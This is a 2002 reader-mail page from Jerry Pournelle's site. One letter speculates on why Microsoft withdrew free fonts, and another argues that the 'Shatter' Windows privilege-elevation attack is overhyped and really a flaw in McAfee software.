Here's an interesting letter to the editor on The Register ( http://www.theregister.co.uk/content/4/26764.html ). Apparently, Microsoft may have been forced to withdraw those fonts because at least some of them were licensed to Microsoft only for use with Microsoft operating systems.

If that's true, we have an interesting situation. Microsoft apparently posted the fonts as "free" (as in beer) without any restrictions on the OS with which they could be used. If those fonts were originally licensed to Microsoft only for use with MS OS's, that means that Microsoft has violated the copyrights and license terms of the font foundry(s) that created the fonts, because the EULA included with the fonts makes no mention of them being limited to use with Windows. Presumably, that makes Microsoft subject to some pretty hefty financial penalties, possibly even per-incident. I wonder how they could ever establish how many people who downloaded the fonts used them with non-MS operating systems.

-- Robert Bruce Thompson thompson@ttgnet.com http://www.ttgnet.com <http://www.ttgnet.com>

=====

And something serious on Shatter. I expect many comments on this:

Dear Mr. Pournelle,

I've been reading and enjoying your columns since the good old days of paper-based Byte so, I guess, the first thing I'd like to do is thank you for all the good reading you've provided me.

I'm writing to you specifically about the "unfixable security flaw" (or shatter attack). It has raised much noise in the NT security world, mostly because, while it does find a local privilege elevation flaw, it is also very, very far from what it claims to be: an unfixable flaw in windows API.

In effect, that "flaw" has been documented since at least 1997 when Matt Pietrek published an article in MSJ about this potential problem. His conclusion was that no application should trust blindly what it gets from messages.

Second, this flaw is actually in the McAfee anti virus software, not the win32 API. It seems the author of that software didn't properly understand the concept of security as it is under NT-based operating system: they just let privileged programs run an user interface in the context of a normal user and this specific interface DO trust blindly the messages it gets from windows.

If you feel like doing some more research on the subject, I would suggest you stop by the NTBugtraq mailing list ( http://www.ntbugtraq.com/ ) and have a look at last month archives.

Like in the Gibson case, there is a layer of truth beneath this vulnerability. But it is mostly an act of someone wanting to make himself a great deal more important than he really is.

Best regards, Stephane Grobety

--- All computers run at the same speed...with the power off.

And I will have more to say on this next week.

 

 

 

 

 

 

 

 

 

 

 

  TOP

CURRENT VIEW

Entire Site Copyright, 1998, 1999, 2000, 2001, 2002 by Jerry E. Pournelle. All rights reserved.

birdline.gif (1428 bytes)